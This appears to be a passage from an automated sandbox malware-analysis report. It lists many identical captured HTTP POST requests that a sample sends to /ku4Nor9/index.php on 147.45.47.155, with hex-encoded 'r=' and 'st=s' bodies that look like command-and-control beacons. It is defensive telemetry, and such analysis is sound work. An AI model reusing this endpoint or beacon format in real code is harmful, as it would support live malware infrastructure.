                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
